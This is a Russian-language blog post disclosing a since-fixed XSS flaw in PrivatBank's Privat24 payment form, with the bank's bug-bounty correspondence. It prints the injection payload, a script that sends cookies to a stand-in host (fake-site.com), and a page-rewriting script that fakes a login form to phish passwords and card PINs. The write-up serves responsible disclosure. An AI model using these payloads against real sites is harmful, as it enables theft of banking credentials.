Pull to refresh

Как работает программа «Поиск IT-уязвимостей» у ПриватБанка

Reading time 5 min
Views 70K

Крупнейший банк Украины Приватбанк объявил о том что “ПриватБанк заплатит 10000 грн. за найденные уязвимости в Приват24”. И информация на сайте банка.

Узнав об этом я вспомнил XSS уязвимость, которую обнаружил и написал о ней в приватный чат оператору Приват24 пол года назад. Погуглив об этой замечательной новости увидел статью на хабре “ПриватБанк обвинил украинского программиста во взломе своего Android-приложения”.

Интересно и страшно в одно и то же время. Ищите нам уязвимости а мы вас будем обвинять во взломе!

Решив что я не нарушаю никаких правил Приватбанка, пошел проверять старую уязвимость, и (почему то я и не сомневался) ее никто не исправил.

На официальном сайте банка есть пример кода формы для интернет-эквайринга.

<form action="https://api.privatbank.ua/p24api/ishop" method="POST">      
<input type="text" name="amt" value="сумма"/>      
<input type="text" name="ccy" value="валюта (UAH / USD / EUR)" />      
<input type="hidden" name="merchant" value="ID мерчанта" />      
<input type="hidden" name="order" value="уникальный код операции" />      
<input type="hidden" name="details" value="назначение платежа" />      
<input type="hidden" name="ext_details" value="дополнительные данные (код товара, и т.п.) /можно оставить пустым/" />      <input type="hidden" name="pay_way" value="privat24" />      
<input type="hidden" name="return_url" value="страница, принимающая клиента после оплаты" />      
<input type="hidden" name="server_url" value="страница, принимающая ответ API о результате платежа" />      
<input type="submit" value="Оплатить" /> </form>


Подставив в поле “details”:

<input type="hidden" name="details" value="test<script>alert(‘xss’);</script>" />


И отправив форму, пользователь попадает на страницу оплаты ПриватБанка на которой и выполняется XSS:

Оригинальная страница выглядит так:



На ней выполняется наш alert():

в firefox:



в chrome:



в IE10:



Идем дальше и загружаем javascript с удаленного хоста:

<input type="hidden" name="details" value="test<script src=’http://fake-site.com/p.js’></script>"/>


И получаем ошибку:



The page at 'https://api.privatbank.ua/p24api/ishop?pid=.....' was loaded over HTTPS, but ran insecure content from 'http://fake-site.com/p.js': this content should also be loaded over HTTPS.

Исправляем и пробуем еще раз:

<input type="hidden" name="details" value="test<script src=’https://fake-site.com/p.js’></script>"/>


Работает! (Главное, сертификат должен быть валидным и не самоподписанным).

Удаленный js файл выполняется:



Далее первое что приходит в голову — отправлять на fake-site.com куки пользователей.

Для этого в наш p.js добавляем:

function getCookies() {
    var cookies = {};           // The object we will return
    var all = document.cookie;  // Get all cookies in one big string
    if (all === "")             // If the property is the empty string
        return cookies;         // return an empty object
    var list = all.split("; "); // Split into individual name=value pairs
    for(var i = 0; i < list.length; i++) {  // For each cookie
        var cookie = list[i];
        var p = cookie.indexOf("=");        // Find the first = sign
        var name = cookie.substring(0,p);   // Get cookie name
        var value = cookie.substring(p+1);  // Get cookie value
        value = decodeURIComponent(value);  // Decode the value
        cookies[name] = value;              // Store name and value in object
    }
    return cookies;
}

$.post("https://fake-site.com/p.php", getCookies());


Используем jQuery только потому, что он доступен на странице банка.

Куки получаем, отправляем на фейковый сайт и видим ошибку:



XMLHttpRequest cannot load 'http://fake-site.com/p.php'. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'https://api.privatbank.ua......' is therefore not allowed access.

Исправляем в p.php:

header("Access-Control-Allow-Origin: *");


И запросы пошли.

На этом не останавливаемся и пробуем подменить страницу чтобы пользователь ввел повторно свой номер телефона, пароль от клиент банка.

Модифицируем p.js так:

var html = ”...тут много кода  css и html..”;

$(function() {
   a();
});

function a(){
    $(".pr_block").find(".pr_password").addClass("fake").removeClass("pr_password").html(html);
    $(".bt_cancel").hide();
    $(".bt_login").hide();
}


Прячем поле ввода кода платежа и показываем форму авторизации:



Так же можно показать форму восстановление доступа (если пользователь вводит пароль 3 раза неправильно то видит такую форму):



Показав эту форму на странице банка злоумышленник может получить от пользователя его пароль, номер телефона, почтовый адрес. Далее при восстановлении пароля банк высылает пароль на мобильный телефон и только ПОСЛЕ его ввода пользователь видит форму ввода пин кода карты, но так как эта форма поддельная то и пароли никто высылать не будет и пользователь сразу увидит форму ввода пин кода:



В итоге у нас есть последние 4 цифры карты пользователя и пин код к ней.

Из формы оплаты у нас есть список всех карт пользователя:



Соответственно злоумышленник знает полный номер карты и пин код от этой карты а так же ФИО пользователя, его номер телефона, пароль от Приват24, номера и балансы всех его карт заведенных в Приват24.

Остается запустить любой сайт с оплатой через Приват24, продавать любой товар с огромными скидками и собирать данные пользователей.

Но так как мы честные граждане, то об этой уязвимости еще раз сообщено в отдел “Поиск IT-уязвимостей” и получены вот такие ответы (Перед получением каждого письма от ПриватБанка я писам им запросы):

1) 13 февраля 2014
Добрый день!
Ваш сигнал по форме оплаты Приват24 взят в работу.
Спасибо за сигнал! О результатах мы проинформируем отдельным сообщением!

2) 20 февраля 2014
Добрый день!
Уязвимость еще не закрыта, над ее устранением работают разработчики.
Прошу подождать некоторое время и не публиковать пока информацию об этой уязвимости. Мы обязательно сообщим о ее устранении. Рассматриваем сигналы мы в течении 7 дней, но устранение уязвимостей, к сожалению, занимает больше времени (с учетом того, что сигналов поступает много).
Спасибо за понимание!

3) 12 марта 2014
Добрый день!
Уязвимость, которую Вы указали уже проработали. Изменения внесли и протестировали на тестовом сервере Приват24. Ожидается выставление исправленной версии на боевой сервер.
Сообщаем что за этот сигнал Вам будет выплачено денежное вознаграждение (ориентировочная сумма — 1500грн.) Прошу сообщить номер Вашей карты «Универсальная» на которую будет осуществлена выплата. Выплата будет осуществлена в начале апреля. До осуществления выплаты прошу не разглашать информацию об этой уязвимости. Спасибо!

4) 18 апреля 2014
Добрый день!
На данный момент все выплаты банком по Крыму приостановлены в связи с неопределенностью политической ситуации в отношении банковского сектора в этом регионе.
Спасибо за понимание!

Дальнейшие действия не проводились, все исследования проводились над своим аккаунтом как и требуют “Условия и правила” банка:



Сегодня проверил — уязвимость исправлена!

P.S. Финальный ответ от ПриватБанка.

Добрый день!
Как и было оговорено, в качестве вознаграждения для вас за выявленную уязвимость в Приват24, от Вашего имени ПриватБанком совершен ​благотворительный платеж в размере 1500грн: ubb.org.ua/ru/project/929/#tabs-1

Ждем новых результативных сигналов об уязвимостях наших ресурсов.​​
Спасибо за сотрудничество!

Очень приятно что в сложившейся сложной ситуации в стране ПриватБанк выполнил свои обязательства по программе.
Tags:
Hubs:
+102
Comments 69
Comments Comments 69

Articles